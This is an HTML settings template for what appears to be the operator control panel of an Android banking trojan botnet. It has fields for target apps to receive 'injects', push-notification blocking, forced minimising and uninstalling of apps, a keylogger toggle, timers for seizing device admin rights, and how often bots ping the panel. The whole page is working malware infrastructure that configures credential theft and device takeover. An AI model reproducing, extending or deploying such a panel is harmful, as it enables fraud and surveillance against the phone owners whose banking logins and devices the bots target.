<form method="post" style='display: inline;'>

<div class="row">
	<!-- left pane -->
<div class="col-lg-6">

	<div class="panel panel-default">
		<div class="panel-heading" style="height: 50px">
			<h3 class="panel-title">Global settings
			<input style="float: right" type="submit" value="Save" class="btn btn-primary btn-sm" />
			</h3>
		</div>

		<div class="panel-body">

<div class="row">
	<div class="col-md-6">
Additional Domains <textarea class="form-control" rows="5" name="field[domains]" placeholder="domain1.com
domain2.org
domain3.xxx">%CONF_DOMAINS%</textarea>
	</div>
	<div class="col-md-6">
		%TEST_SERVER_ERRORS%
		Server time: <code>%SERVER_TIME%</code><br />
		License is active until: <code>%EXPIRE_ON%</code><br />
		Injects version: <code>%SMARTS_VER%</code><br />
		Last backup made at: <code>%LAST_BACKUP_AT%</code><br />
	</div>
</div>
<br />
<div class="row">
	<div class="col-md-6">
Desired Apps (+ all injects) <textarea class="form-control" rows="5" name="field[desired_apps]" placeholder="%PKG_PLACEHOLDER%">%DESIRED_APPS%</textarea>
	</div>
	<div class="col-md-6">
Block Push Notifications on Apps <textarea class="form-control" rows="5" name="field[block_push_apps]" placeholder="%PKG_PLACEHOLDER%">%BLOCK_PUSH_APPS%</textarea>
	</div>
</div>

<div class="row"  style="margin-top: 20px">
	<div class="col-md-6">&nbsp;</div>
	
	<div class="col-md-6">
		Start block after
		<input type="text" name="field[block_push_delay]" value="%BLOCK_PUSH_DELAY%" class="input-sm" style="border: 1px solid #ccc; color: #555; display: inline-block" size="5" />
		sec.
	</div>
</div>

<br />
<div class="row">
	<div class="col-md-6">
Minimize Apps <textarea class="form-control" rows="5" name="field[minimize_apps]" placeholder="%PKG_PLACEHOLDER%">%MINIMIZE_APPS%</textarea>
	</div>
	<div class="col-md-6">
Uninstall Apps <textarea class="form-control" rows="5" name="field[uninstall_apps]" placeholder="%PKG_PLACEHOLDER%">%UNINSTALL_APPS%</textarea>
	</div>
</div>

<div class="row"  style="margin-top: 20px">
	<div class="col-md-6">
Start minimize after
		<input type="text" name="field[minimize_delay]" value="%MINIMIZE_DELAY%" class="input-sm" style="border: 1px solid #ccc; color: #555; display: inline-block" size="5" />
		sec.
	</div>
	
	<div class="col-md-6">
		Uninstall apps after
		<input type="text" name="field[uninstall_delay]" value="%UNINSTALL_DELAY%" class="input-sm" style="border: 1px solid #ccc; color: #555; display: inline-block" size="5" />
		sec.
	</div>
</div>


		</div>
	</div>


</div>
	

	<!-- right pane -->
	<div class="col-lg-6">

		<div class="panel panel-default">
			<div class="panel-heading"  style="height: 50px">
				<h3 class="panel-title">Bot default settings
				<input style="float: right" type="submit" value="Save" class="btn btn-primary btn-sm" />
				</h3>
			</div>
			<div class="panel-body">

<div class="row">
<div class="col-md-6">
	<label for="keylogger_enabled_chk">Enable keylogger </label>
	<input id="keylogger_enabled_chk" type="checkbox" name="field[keylogger_enabled]" %KEYLOGGER_ENABLED_CHK% />
</div>
<div class="col-md-6">
	Start keylogger after
	<input type="text" name="field[keylogger_delay]" value="%KEYLOGGER_DELAY%" class="input-sm" style="border: 1px solid #ccc; color: #555; display: inline-block" size="5" />
	sec.
</div>
</div>

<br />

<div class="row">
<div class="col-md-6">
	Start injects after
	<input type="text" name="field[injects_delay]" value="%INJECTS_DELAY%" class="input-sm" style="border: 1px solid #ccc; color: #555; display: inline-block" size="5" />
	sec.
</div>

<div class="col-md-6">
Get device admin after
		<input type="text" name="field[get_device_admin_delay]" value="%GET_DEVICE_ADMIN_DELAY%" class="input-sm" style="border: 1px solid #ccc; color: #555; display: inline-block" size="5" />
		sec.
</div>
</div>

<div class="row"  style="margin-top: 20px">

	<div class="col-md-6">
	Ping panel every
	<input type="text" name="field[net_delay]" value="%NET_DELAY%" class="input-sm" style="border: 1px solid #ccc; color: #555; display: inline-block" size="5" />
	sec.
	<p class="%PING_WARN_HIDE% text-center" style="margin: 0"><b style="color: darkred;">Delay is too small.</b> <button type="button" class="btn btn-xs btn-danger" onclick='alert("In conjuction with large amount of bots it will cause server lags. Recommended minimal delay is 60 sec.")'>?</button></p>
	</div>
	
	<div class="col-md-6">
&nbsp;
	</div>
</div>

			</div>
		</div>

	</div> <!-- end right pane -->



</div> <!-- end main row -->

</form>
